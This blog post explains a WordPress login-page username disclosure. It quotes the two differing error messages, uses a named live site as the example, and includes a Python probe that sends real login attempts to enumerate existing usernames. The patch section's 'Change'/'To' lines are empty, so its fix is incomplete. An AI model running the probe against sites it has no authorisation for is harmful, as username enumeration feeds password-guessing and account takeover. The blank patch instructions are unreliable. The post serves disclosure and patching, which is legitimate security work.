
Patch WordPress UserName Disclosure

On 26 May, a researcher (Veronica Valero of Talsoft S.R.L.) posted an advisory about a Direct Object Reference issue affecting WordPress blogs.

A reply by “Zerial” on the same mailing list described another WordPress weakness.

A simple test against the login box tells you whether a given username exists on a WordPress blog: submit the username with any password and compare the error message WordPress returns.

For example, on http://www.noktec.be/wp-admin/, logging in with the username “test” and a bogus password gives a different message depending on whether the account exists.

When the username exists, the response is:

Error: The password you entered for the username test is incorrect. Lost your password?

When the username does not exist, the response is:

Error: Invalid username. Lost your password?

This issue was already reported as OSVDB 55713 in 2009 but is still present.
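The test above, automated. This is an added example written for this post, not Zerial’s or EthicalHack3r’s code: it classifies a wp-login.php response by the two error strings quoted above, and the `fetch_login_response` helper assumes the classic form fields `log`, `pwd` and `wp-submit`. The sample response bodies and the usernames “admin” and “test” are constructed, and the generic message in `PATCHED` shows what the probe sees once both cases return the same text.

```python
"""Probe a WordPress login form for username disclosure.

Added example for this post (not Zerial's or EthicalHack3r's code). It
assumes the classic wp-login.php form fields (log, pwd, wp-submit) and the
two error strings quoted above; the sample HTML below is constructed.
"""
import re
import sys
import urllib.parse
import urllib.request

# Substrings of the two distinguishable WordPress error messages.
MSG_BAD_PASSWORD = "The password you entered for the username"
MSG_INVALID_USER = "Invalid username"


def classify_login_response(html):
    """Map the wp-login.php error text to a verdict on the username.

    Returns "exists", "does-not-exist" or "undetermined" (a generic
    message, a lockout page, or a successful-login redirect body).
    """
    # Strip tags so <strong>ERROR</strong> markup does not break matching.
    text = re.sub(r"<[^>]+>", " ", html)
    if MSG_BAD_PASSWORD in text:
        return "exists"
    if MSG_INVALID_USER in text:
        return "does-not-exist"
    return "undetermined"


def enumerate_users(responses):
    """Given {username: html}, return the usernames confirmed to exist."""
    return sorted(u for u, html in responses.items()
                  if classify_login_response(html) == "exists")


def fetch_login_response(base_url, username, password="x", timeout=10):
    """POST one bogus login to <base_url>/wp-login.php and return the body."""
    url = base_url.rstrip("/") + "/wp-login.php"
    data = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}
    ).encode()
    req = urllib.request.Request(
        url, data=data, headers={"User-Agent": "wp-user-probe/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample bodies modelled on the messages quoted in the post.
VULNERABLE = {
    "admin": '<div id="login_error"><strong>ERROR</strong>: The password you '
             'entered for the username <strong>admin</strong> is incorrect. '
             '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>',
    "test": '<div id="login_error"><strong>ERROR</strong>: Invalid username. '
            '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>',
}

# After a fix both cases return one generic message, so nothing leaks.
GENERIC = ('<div id="login_error"><strong>ERROR</strong>: The username or '
           'password you entered is incorrect.</div>')
PATCHED = {"admin": GENERIC, "test": GENERIC}

if __name__ == "__main__":
    if len(sys.argv) == 3:   # live probe: python3 probe.py <base_url> <username>
        body = fetch_login_response(sys.argv[1], sys.argv[2])
        print(sys.argv[2], "->", classify_login_response(body))
    else:
        print("vulnerable:", enumerate_users(VULNERABLE))   # ['admin']
        print("patched:   ", enumerate_users(PATCHED))      # []
```

Run without arguments to see the classifier on the constructed samples; with a base URL and a username it performs a single real login attempt. Only probe hosts you are authorised to test, and keep the request rate low, since many installations lock out or rate-limit repeated failed logins.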

A patch was released by “EthicalHack3r” :


wp-includes/user.php:91

Change:

To:

and change

wp-includes/user.php:111

Change:

To:

( source : EthicalHack3r)


And that’s it. Note that a direct edit to wp-includes/user.php is overwritten by the next WordPress core upgrade, so the change has to be reapplied after each update.
